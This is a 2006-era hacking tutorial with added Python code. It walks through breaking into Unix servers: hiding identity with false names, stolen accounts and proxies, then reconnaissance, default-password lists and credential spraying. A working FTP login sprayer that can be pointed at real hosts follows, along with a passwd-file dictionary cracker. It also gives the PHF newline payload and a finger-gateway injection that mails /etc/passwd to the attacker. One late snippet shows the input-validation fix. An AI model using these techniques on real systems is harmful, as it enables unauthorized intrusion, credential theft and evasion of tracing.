By PranaY, Feb 2006. You are free to distribute this page on your site; all I ask is that you leave this notice here and place a link to http://www.ethicalhacker.tk on your site.
This guide is beta and starts at the absolute basics, step by step. If you like it, I'll try to keep adding sections. If you know your stuff, send me sections you've written yourself and I'll add them in. If you want to put this guide on your site, contact me.
INTRODUCTION:
A little background is needed before we get into hacking techniques.
When we talk about "hacking", we are talking about getting some access on a server that we shouldn't have. Servers are set up so that many people can use them. These people each have different "accounts" on the server, like different directories that belong just to them. If Fred has an account with an ISP (Internet Service Provider), he will be given:
(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.
This login name and password will usually give you access to all of Fred's services: his mail, news services and web pages.
There is also the "root" account, which has its own login and password. This gives super-user access to the entire server. We will focus on "getting root" in this help file.
THE ANATOMY OF THE 'HACK':
There are two main ways to break into a system. Think of a server as a Swiss bank vault. You can try to get in by finding the combination of the vault. This is like finding the password: it's how you are meant to get in. The second way is by using dynamite. You forget all about the "proper" way to get in. This is like using "exploits", weaknesses in the server's operating system or in the software it runs, to gain access.
'DON'T GET CAUGHT':
Hacking is illegal, and it is very easy to trace you if the people running the site realize they have been hacked. Wherever you go, your IP address (your computer's network identifier) travels with your traffic and is often logged.
Solutions:
1. When you set up your account with an ISP, give a false name and address. Or, even better, sign up for an anonymous dial-up account from anonymizer.com.
2. Hack using a filched account (a stolen password, etc.). There are tools that will steal passwords for you from the machines in public net cafes and libraries.
3. Route your connection through something else.
An easy way to do this is to change your browser's proxy settings. By using a proxy meant for a different ISP, it can look like you are surfing from wherever that ISP is. Things to look for: public proxy server lists, Hide IP Platinum, WinGate, WinProxy. Remember that the proxy operator sees your real address and may keep logs of its own.
You should also do any important info gathering through the IP Jamming Applet to hide your IP.
If you want super anonymity, you should be surfing from an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet. Be aware that some ISPs could use Caller ID to check the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.

INFO GATHERING:
To start off, you will probably need to gather information about the site using Internet tools.
DIRT DIGGING STAGE:
We are now taking the first steps of any hack: info gathering.
You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring the site's web page up in the IP Jammer's window.
CASE THE JOINT:
1. First, check out the site. Take down any email addresses, and copy down the HTML of important pages.
THE OLD BOUNCING MAIL TRICK:
2. Send a mail that will bounce off the site. If the site is www. , send a mail to a user that cannot exist, such as blahblahblah@ followed by the site's domain. It will bounce back to you, and the headers of the bounce will give you information: the name and software of their mail server, and the route the mail took to get there.
Copy the information from the headers down.
(To maintain anonymity, it might be a good idea to send and receive the mail from a free web-based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through their logs after they are hacked.)
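What a bounce actually gives away, as an added example that is not part of the original guide: the Python below parses a constructed Postfix-style bounce, pulls the target's mail server name and software out of the Received: lines and the delivery-status part, and also shows the catch behind the anonymity note above: the returned copy of your own message carries the IP you sent from in its first Received: line. Every host name and address in BOUNCE is made up.

```python
"""Read what a bounced mail gives away.  Added example for this page, not code
from the original guide.  BOUNCE is a constructed Postfix-style delivery status
notification; every host name and address in it is made up."""
import email
import re

BOUNCE = """\
Return-Path: <>
Received: from mail.example.test (mail.example.test [203.0.113.7])
    by mx.freemail.test (Postfix) with ESMTP id 8F2A1C0012
    for <you@freemail.test>; Tue, 14 Feb 2006 10:22:01 +0000
From: MAILER-DAEMON@mail.example.test
To: you@freemail.test
Subject: Undelivered Mail Returned to Sender
Content-Type: multipart/report; report-type=delivery-status; boundary="=_b"

--=_b
Content-Type: text/plain

This is the mail system at host mail.example.test.

--=_b
Content-Type: message/delivery-status

Reporting-MTA: dns; mail.example.test

Final-Recipient: rfc822; blahblahblah@example.test
Action: failed
Status: 5.1.1
Diagnostic-Code: smtp; 550 5.1.1 User unknown in local recipient table

--=_b
Content-Type: message/rfc822

Received: from [192.0.2.25] (unknown [192.0.2.25])
    by mail.example.test (Sendmail 8.12.11/8.12.11) with SMTP id k1EAM0Ab
    for <blahblahblah@example.test>; Tue, 14 Feb 2006 10:22:00 +0000
From: you@freemail.test
To: blahblahblah@example.test
Subject: test

hello
--=_b--
"""

# "from <host> (<reverse-dns [ip]>) by <host> (<MTA software>) ..."
RECEIVED_RE = re.compile(
    r"from\s+(?P<from_host>\S+)(?:\s+\((?P<from_info>[^)]*)\))?"
    r"\s+by\s+(?P<by_host>\S+)(?:\s+\((?P<by_software>[^)]*)\))?")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(header):
    """One Received: line -> sending host and IP, receiving host, MTA software.
    Folded continuation lines are joined first."""
    flat = " ".join(header.split())
    m = RECEIVED_RE.search(flat)
    if not m:
        return {"raw": flat}
    hop = m.groupdict()
    ip = IP_RE.search(hop.get("from_info") or hop["from_host"])
    hop["from_ip"] = ip.group(1) if ip else None
    return hop


def analyse_bounce(raw):
    msg = email.message_from_string(raw)
    report = {"hops": [parse_received(h) for h in msg.get_all("Received", [])],
              "reporting_mta": None, "diagnostic": None, "original_hops": []}
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "message/delivery-status":
            # Parsed as header blocks: per-message fields, then per-recipient.
            for block in part.get_payload():
                if block["Reporting-MTA"]:
                    report["reporting_mta"] = block["Reporting-MTA"].split(";", 1)[-1].strip()
                if block["Diagnostic-Code"]:
                    report["diagnostic"] = " ".join(block["Diagnostic-Code"].split())
        elif ctype == "message/rfc822":
            # The returned copy of YOUR message: its Received: line records the
            # address you sent from, hence the guide's advice to use webmail.
            original = part.get_payload(0)
            report["original_hops"] = [parse_received(h)
                                       for h in original.get_all("Received", [])]
    return report
```

Run `analyse_bounce(BOUNCE)` and look at `hops` (the bounce's own path: the target's MTA name, its IP and the software banner in parentheses), `reporting_mta` and `diagnostic` (the server's own description of why it rejected the address), and `original_hops`, where the 192.0.2.25 entry is the sender's address as the target recorded it.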
TRACEROUTE:
3. Still using stealth features, traceroute the site. This traceroute search is available from the Hacker's Home Page, in the Net Tools section.
This will tell you the upstream provider of the victim server, and the routers your traffic passes through on the way there.
WHOIS:
3. Still using stealth features, whois the site. This whois search is available from the Hacker's Home Page, in the Net Tools section.
This will give you information on the owners and the name servers that run the site. Write it down.
GIVE 'EM THE FINGER:
4. Finger the site. Use the finger service at Cyberarmy.Com to check the site. Try fingering with just "finger @" and the host name first. This sometimes lists the users currently logged in. If this does not work, try fingering any email addresses you found on the site and through whois. This will sometimes give you useful information: login names, full names, home directories and last-login times.
THE DEADLY PORT SCAN:
5. Now, we're about to get rough on the site. Port scan the site.
Port scanning checks which ports are open on an IP address. It is extremely useful; however, it practically screams to the webmasters of the victim site that they are in the middle of being hacked. There is basically no legitimate reason to port scan a site unless you are about to hack it.
There are no very good ways to hide a port scan, but there are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However, the Exploit Generator for Windows is one that claims to be stealthy. If you are trying to enter a very secure site, perhaps forget about port scanning for now, unless you are running Linux.
A port scan will tell you which services a site is running. If port 21 is open, it almost always means they have an FTP server. If port 23 is open, it means they have telnet. The port number only tells you the usual service, not which program is running or its version; that is what the telnetting steps that follow are for.
TELNETTING:
5. The aim of telnetting to the site is basically to try and find out the server type. While your browser is in stealth mode, use the Anonymous Telnet applet to open a Telnet window.
Telnet to the site on port 23. Usually, if the address is "www. ", try telnetting to " ". If this does not work, try to telnet to telnet. , or try telnetting to any of the sites listed as name servers in your previous whois search. Once you have a connection, note any information the login banner gives you, such as the operating system and its version.
TELNETTING:
Now change the telnet to port 21. This should put you straight onto the server's FTP port, and the 220 greeting it sends often names the FTP software. If this works, type SYST; the 215 reply tells you the operating system type (for example "215 UNIX Type: L8").
TELNETTING:
Now, if you are lucky, try telnetting to port 80, the HTTP port. Nothing will appear until you send a request: type HEAD / HTTP/1.0 and press Enter twice. The Server: line in the response usually names the web server software and version. Note anything it gives you.
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you can't even figure out what you're dealing with?
A final resort is to run a program called What's Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. In our analogy, we are trying to find the combination of the safe.
EASY THINGS FIRST:
You would kick yourself if you spent weeks trying advanced hacking with exploits, IP spoofing and social engineering, just to find that you could have got in by using:
$Login: root
$Password: root
So, let's just try this first and get it out of the way. Some Unix systems come set up with default accounts and passwords, and sometimes these are not changed. So, we telnet to the site.
Don't use your usual telnet program. Unless you are using a filched or anonymous account, it will show your IP address to the site. With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password) root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root-level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins, meaning they only have power over the files and processes they own.
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are careless enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@ , try logging in (through telnet or an FTP program to their server) as:
$Login: fred
$Password: fred
Unix login names are case-sensitive, so use the exact spelling of the part before the @, which is usually all lower case.
Do this with all the names you have found; you might get lucky.
Did this work?
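The port-21 telnetting step and the two password-guessing steps above, carried out in code, as an added example that is not from the original guide. It reads the 220 greeting, asks SYST, then tries account:password pairs (the first few defaults from the list plus login-name-as-password pairs built from harvested addresses), opening a fresh connection for each attempt. The target is a constructed fake FTP server that accepts only root:root; connect_real(host) is how you would point the same code at a real server, and the two e-mail addresses are assumptions.

```python
"""FTP banner, SYST and credential probe: the port-21 telnet step and the two
password-guessing steps of this guide, in code.  Added example, not from the
original guide.  fake_ftp_server is a constructed stand-in target (it accepts
only root:root) so the demo runs offline; connect_real() is the hook for a host."""
import socket
import threading

DEFAULT_CREDS = [("root", "root"), ("sys", "sys"), ("bin", "bin"),
                 ("guest", "guest"), ("admin", "admin")]  # first few from the list above


def creds_from_emails(emails):
    """'fred@...' seen on the site -> try fred:fred (logins are case-sensitive,
    so the local part is lower-cased)."""
    users = dict.fromkeys(a.split("@", 1)[0].strip().lower() for a in emails)
    return [(u, u) for u in users if u]


class FtpControl:
    """Just enough of the FTP control channel (RFC 959) over a connected socket."""
    def __init__(self, sock, timeout=5.0):
        sock.settimeout(timeout)
        self.sock, self.buf = sock, b""

    def _line(self):
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, self.buf = self.buf.split(b"\r\n", 1)
        return line.decode("latin-1")

    def reply(self):
        # '220-' begins a multi-line reply that ends with a '220 ' line.
        first = self._line()
        code, lines = first[:3], [first]
        while first[3:4] == "-" and not lines[-1].startswith(code + " "):
            lines.append(self._line())
        return code, "\n".join(lines)

    def cmd(self, text):
        self.sock.sendall((text + "\r\n").encode("latin-1"))
        return self.reply()


def fingerprint(connect):
    """Greeting banner plus SYST; a 215 reply names the OS type."""
    sock = connect()
    try:
        ftp = FtpControl(sock)
        _, banner = ftp.reply()
        code, syst = ftp.cmd("SYST")
        ftp.cmd("QUIT")
        return {"banner": banner, "syst": syst if code == "215" else None}
    finally:
        sock.close()


def try_login(connect, user, password):
    """Fresh connection per attempt: servers drop you after a few failures."""
    sock = connect()
    try:
        ftp = FtpControl(sock)
        ftp.reply()                                  # greeting
        code, _ = ftp.cmd("USER " + user)
        if code == "331":                            # password required
            code, _ = ftp.cmd("PASS " + password)
        return code == "230"                         # logged in
    except OSError:
        return False
    finally:
        sock.close()


def probe(connect, creds):
    result = fingerprint(connect)
    result["valid"] = [(u, p) for u, p in creds if try_login(connect, u, p)]
    return result


def fake_ftp_server(conn, valid=(("root", "root"),)):
    """Constructed target, not part of the technique."""
    def send(line):
        conn.sendall((line + "\r\n").encode("latin-1"))
    user = None
    send("220-Welcome to ftp.example.test")
    send("220 Service ready")
    for raw in conn.makefile("rb"):
        verb, _, arg = raw.decode("latin-1").rstrip("\r\n").partition(" ")
        verb = verb.upper()
        if verb == "SYST":
            send("215 UNIX Type: L8")
        elif verb == "USER":
            user = arg
            send("331 Password required for " + arg)
        elif verb == "PASS":
            send("230 User logged in" if (user, arg) in valid else "530 Login incorrect")
        elif verb == "QUIT":
            send("221 Goodbye")
            break
        else:
            send("502 Command not implemented")
    conn.close()


def connect_fake():
    client, server = socket.socketpair()            # server end runs on a thread
    threading.Thread(target=fake_ftp_server, args=(server,), daemon=True).start()
    return client


def connect_real(host, port=21):
    return lambda: socket.create_connection((host, port), timeout=5)


def demo():
    emails = ["kangaroo@www.example.test", "Fred@www.example.test"]  # assumed harvest
    return probe(connect_fake, DEFAULT_CREDS + creds_from_emails(emails))
```

`demo()` returns the greeting, the SYST reply and the list of pairs that logged in. Reconnecting per attempt is deliberate: most FTP daemons count failed logins per session and close the connection after a handful, and a spray that keeps one session open stops silently at that point. Note also that every attempt, successful or not, lands in the server's log with the connecting address, which is the point of the stealth advice above.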
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks whether the passwords you gave were correct or not. There is a file called "passwd" (in /etc) on each Unix system with an entry for every user, and on older systems the second field of each entry holds the user's password in hashed (one-way encrypted) form. The system hashes what you type and compares it with the stored value. So, if we can't guess the passwords, we will now try to rip this file and crack the hashes offline.
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan you found an open port 21, it's a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to the site. Example: ftp://
If that does not work, try to FTP to ftp. followed by the domain. Example: ftp://ftp.
If that does not work, try to FTP to the domain name servers listed when you did your whois search. Example: ftp://ns1.
ANCIENT CHINESE FTP METHOD:
Now that you are connected to the site's FTP server, click on their /etc directory. You should see a file called "passwd" and maybe a file called "group". Download the "passwd" file, and look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is "kangaroo" and their hashed password is "3A62i9qr". Note: this is not their password, but a one-way hash of it. With traditional crypt(3) the first two characters are the salt and the rest is the hash of the password under that salt.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second field, where the hash would be, replaced by *'s or x's? This is bad: the passwords are shadowed. The hashes have been moved to /etc/shadow, which only root can read, so there is nothing in this file to crack. This is how most passwd files are nowadays. One more catch: an anonymous FTP server is usually chrooted, and the /etc/passwd you see inside it is a stripped copy put there so that directory listings show user names, not the real one. However, if you got a passwd file which has some non-shadowed entries, you can put your hand to cracking it.

DECRYPTING PASSWD FILES:
There are a few programs around which were written to crack Unix passwd files. (The hashes are one-way, so "decrypting" really means guessing candidate passwords, hashing each one with the entry's salt and comparing the result with the stored hash.) The most famous one was called "Cracker Jack". Many "hacking" texts strongly recommend this program, but they are mostly talking rubbish. It's old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5'. It is readily available. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute-force technique used is genius. But you have to go down to DOS to use it.
You will also need a large "wordlist", with every English word: the bigger the better. The crack programs test every word in the wordlist (and simple variations of each word, such as capitalising it or adding a digit) against the passwd file. If the wordlist is big enough, you have a good chance of getting a password.
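The passwd-file steps above in code, as an added example that is not from the original guide or from John the Ripper: parse the file, tell shadowed, locked and empty-password entries from crackable ones, list every UID-0 account (any of them is root, whatever it is called), and run a salted dictionary attack with a few mangling rules over what is left. SAMPLE_PASSWD is constructed from the entries shown above, and stand_in_crypt is a salted SHA-256 standing in for crypt(3) so the code runs without the deprecated crypt module; against a real file you would hand the hashes to John, but the attack logic is the one shown here.

```python
"""Sort a passwd file into what can and cannot be attacked, then run a salted
dictionary attack over the crackable entries the way John / Cracker Jack do.
Added example for this page, not code from the original guide.  SAMPLE_PASSWD is
constructed, and stand_in_crypt replaces crypt(3) (DES crypt, or the $1$/$6$
variants John handles) with a salted SHA-256 so the example runs without the
deprecated crypt module; the attack logic is unchanged."""
import hashlib
from dataclasses import dataclass


@dataclass
class PasswdEntry:
    name: str
    pwfield: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def stand_in_crypt(word, salt):
    """2-char salt + 11 chars: the shape of a traditional DES crypt string."""
    digest = hashlib.sha256((salt + word).encode()).hexdigest()
    return salt + digest[:11]


def parse_passwd(text):
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def classify(entry):
    """What the second field tells you."""
    pw = entry.pwfield
    if pw == "":
        return "no password"      # logs in with no password at all
    if pw in ("x", "*"):
        return "shadowed"         # hash is in /etc/shadow (root-only) or the account is disabled
    if pw.startswith("!"):
        return "locked"
    return "hash"                 # something to feed the cracker


def uid0_accounts(entries):
    """Every UID-0 account is root, whatever it is called."""
    return [e.name for e in entries if e.uid == 0]


def mangle(word):
    """A few of the rules crackers apply to each wordlist entry."""
    yield word
    yield word.capitalize()
    yield word + "1"
    yield word.capitalize() + "1"
    yield word[::-1]


def dictionary_attack(entries, wordlist, crypt_fn=stand_in_crypt):
    """Hash each candidate once per distinct salt and compare it against every
    entry sharing that salt; the salt is the first two characters of the field."""
    by_salt = {}
    for e in entries:
        if classify(e) == "hash":
            by_salt.setdefault(e.pwfield[:2], []).append(e)
    found = {}
    for word in wordlist:
        for cand in mangle(word):
            for salt, group in by_salt.items():
                h = crypt_fn(cand, salt)
                for e in group:
                    if e.pwfield == h and e.name not in found:
                        found[e.name] = cand
    return found


# Constructed file; hashes made with stand_in_crypt so the demo is self-consistent.
SAMPLE_PASSWD = "\n".join([
    f"root:{stand_in_crypt('root', '2f')}:0:1:Operator:/:/bin/csh",
    "admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh",
    f"toor:{stand_in_crypt('secret', 'Qx')}:0:1:Backup operator:/:/bin/sh",
    "guest::200:20:Guest account:/home/guest:/bin/sh",
    f"kangaroo:{stand_in_crypt('Kangaroo1', '3A')}:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh",
    "uucp:x:5:5:uucp:/var/spool/uucp:/sbin/nologin",
])
WORDLIST = ["password", "root", "kangaroo", "tanaka", "operator"]


def demo():
    entries = parse_passwd(SAMPLE_PASSWD)
    return {
        "classes": {e.name: classify(e) for e in entries},
        "uid0": uid0_accounts(entries),
        "cracked": dictionary_attack(entries, WORDLIST),
    }
```

In the sample, root falls to the default "root" and kangaroo to a capitalised-plus-digit variant of a word taken from the GECOS field, while toor (a second UID-0 account with a password not in the list) survives; that is exactly the situation the text describes: a big enough wordlist, plus rules, plus patience. Grouping by salt matters because traditional crypt hashes each candidate separately per salt, so the cost of a run is (candidates x distinct salts), not (candidates x entries).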
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a CGI program called PHF, let's just make sure... If it is still there, it lets you run commands on the web server as the user the web server runs as, which is enough to read the passwd file remotely without having any account on the machine.
In the Overlord Anonymizer, type:
http://www./cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
The %0a is a newline: PHF escaped most shell metacharacters in the form fields but missed the newline, so the shell runs /bin/cat /etc/passwd as a second command.
If PHF is active (often not), this string will print the /etc/passwd file straight to your web browser; all you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack and has logged your IP. But don't worry: so long as you were using the anonymizer, it is the anonymizer's address that was logged.
FINGER BOX HACKING:
Finger servers are a hacker's friend. Let's find out whether www. has a finger gateway.
In the Anonymizer, assuming that the server's name starts with www, type www./cgi-bin/finger
If the finger gateway is operational, a box should appear for you to enter the name you want to finger. If it is operational, you have another chance to receive the /etc/passwd file, because the gateway hands whatever you type to the finger command through a shell.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@", and that your email address is "[email protected]").
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@; /bin/mail [email protected] < /etc/passwd
The semicolon ends the finger command, so the shell on the server runs /bin/mail as a second command, and it mails you the /etc/passwd file. If this works, you now have the /etc/passwd file in your mailbox. You can now run a crack program against it and have a little fun on their box.
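Why both the PHF trick and the finger-box trick work, as an added example that is not the code of either program: each CGI pasted a form field into a shell command line, and the shell treated the newline (%0a) or the semicolon as the start of a second command. phf_escape reproduces PHF's metacharacter filter as reconstructed from the published analyses (treat the exact character list as an assumption), the two command strings are simplified models of what the CGIs ran, the payloads are the two from this page with the mail address made up, and safe_argv is the fix: allow-list the lookup key and pass it as a single argv element, never through a shell.

```python
"""Command injection through a CGI that builds a shell command line: the PHF
newline hole and the finger gateway's semicolon, with the fix.  Added example
for this page, not the original programs.  PHF_FILTERED is a reconstruction of
PHF's escape list (assumption); the command strings are simplified models."""
import re
from urllib.parse import parse_qs

# Characters PHF backslash-escaped before handing the line to /bin/sh.
# Newline is not among them, which is the whole bug.
PHF_FILTERED = set("&;`'\"|*?~<>^()[]{}$\\")


def phf_escape(value):
    return "".join("\\" + c if c in PHF_FILTERED else c for c in value)


def phf_command(query_string):
    """Model of PHF: Qalias from the query string, 'escaped', pasted into a ph
    lookup command.  %0a decodes to a newline that phf_escape leaves alone."""
    qalias = parse_qs(query_string).get("Qalias", [""])[0]
    return "/usr/local/bin/ph -m alias=" + phf_escape(qalias)


def finger_command(who):
    """Model of the finger gateway: no filtering at all."""
    return "finger " + who


def shell_commands(cmdline):
    """Split a command line the way sh does into separate commands: newline and
    ';' separate commands unless backslash-escaped.  No quoting model; it is
    only meant to show how many commands the shell would run."""
    parts, cur, i = [], "", 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\" and i + 1 < len(cmdline):
            cur += cmdline[i:i + 2]
            i += 2
            continue
        if c in ";\n":
            parts.append(cur)
            cur = ""
        else:
            cur += c
        i += 1
    parts.append(cur)
    return [p.strip() for p in parts if p.strip()]


# The fix: never build a shell string from user input.  Validate the lookup key
# against an allow-list and pass it as one argv element, i.e. run it with
# subprocess.run([program, key]) and shell=False, so no shell ever parses it.
LOOKUP_KEY = re.compile(r"[A-Za-z0-9._-]+(@[A-Za-z0-9.-]+)?")


def safe_argv(program, user_input):
    if not LOOKUP_KEY.fullmatch(user_input):
        raise ValueError("lookup key contains characters outside the allow-list")
    return [program, user_input]


def demo():
    phf = phf_command("Qalias=x%0a/bin/cat%20/etc/passwd")        # newline: two commands
    phf_semi = phf_command("Qalias=x%3b/bin/cat%20/etc/passwd")   # ';' gets escaped: one
    finger = finger_command("kangaroo@; /bin/mail you@freemail.test < /etc/passwd")
    return {"phf": shell_commands(phf),
            "phf_semicolon": shell_commands(phf_semi),
            "finger": shell_commands(finger)}
```

`demo()` shows the PHF filter doing its job against a semicolon and failing against the newline, and the unfiltered finger gateway splitting straight into two commands. The 'Smile! You're on Candid Camera!' response mentioned above was the patched PHF's way of refusing, and logging, a request with a newline in it; the real fix is the argv form, which leaves nothing for a shell to reinterpret.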
LINUX INSTALLATION
All the above really has given you the basic ideas. To do anything further, and implement any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you don't even have to repartition your hard drive!
Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a hard drive with at least 100MB free. You've got a floppy drive, etc. You know how to unzip files. And you don't want to spend any money. Luckily, Linux is free and easy to set up.
1/ Download ZipSlack. It's big, but it's all you need.
2/ What you have is a version of
Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up.
I don't use Slackware, and there are some better versions around now - like RedHat 5.2.
But, it is a good stable version - and, like I say, very simple to download and setup.
Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your hard drive. That's right, with this distro you don't even have to repartition your drive. It can be on the same hard drive you have Windows on! (I told you this would be easy.) Just make sure it's a top-level directory on your hard drive, like c:\linux, not in a subdirectory anywhere.
4/ Now, just unzip all the contents of zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, here's the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to the partition that holds your Linux directory. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1
(hda is the IDE primary master disk, and hda1 is its first partition.)
I have Linux on my drive D: (the IDE secondary master disk), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right Shift key and PageUp) when the kernel halts, to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You
are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and
'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run
Linux.bat
10/ The Linux system will load itself
over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so
only linux loads).
11/ You will see a whole lot of stuff
loading. Then you will see a login: prompt.
12/ You have an operating system just
like all the big net servers have!
13/ Okay, just type in 'root', and you
have root access on the system. You will want to give yourself a password, so type
'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Don't let that worry you; it's just like an MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like DOS), 'pico' (an editor, used like 'pico text.txt'), and 'mc' (Midnight Commander, a nice menu program that comes with ZipSlack).
15/ Now, type 'setup'.
16/ Set up your mouse, network settings, screen stuff. Really easy. Just like: 'are you using a 2-button mouse or 3?' Easy.
17/ Now, if you want net access through this, type 'pppsetup'. This starts the PPP (Point-to-Point Protocol) setup. You will need to know all your Internet settings, like your gateway, nameserver addresses, etc. If you don't know these, go back to Windows and see what values you used in Control Panel: Internet.
18/ Okay. Reboot. Your mouse should be
working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If
you have a standard external modem on Com 2, it is probably okay. Otherwise, it's
sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc' to run Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'rc.serial'. Comment out the auto-config section with '#' signs, and go to the manual config section. Uncomment /dev/cua0 (COM1) and /dev/cua1 (COM2), or /dev/cua2 or cua3 (COM3 or COM4) for internal modem users. Now, from Windows, go to Accessories: System Tools: System Information (Win 98) to get the IRQ and port settings for your modem. If you are in Win95, run Microsoft Diagnostics (msd.exe) instead. Put these settings in. Then edit rc.S and, at the bottom, uncomment the place where it calls the rc.serial file.
20/ If you have a CD-ROM you can also edit rc.S so that it checks for a CD-ROM during bootup.
21/ All things going well, you should now have a fully functional Unix-type system on your computer. You can download all your latest little programs (in .tgz format). To set up software, say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then choose 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows-type interface. You don't need one. But if you want to surf using Linux, etc., it is better to have a graphical interface, although you can run a browser called 'lynx' from the plain Linux console.
23/ You can get some things, like
X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look
vital (about 8 of them), and run pkgtool to install them all. You will probably find that
setting up X-Win for the first time is a huge pain. It was for me at least - you need to
know, for example, the horizontal and vertical refresh rates of your monitor. Then, get
something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.
25/ You will have fun tweaking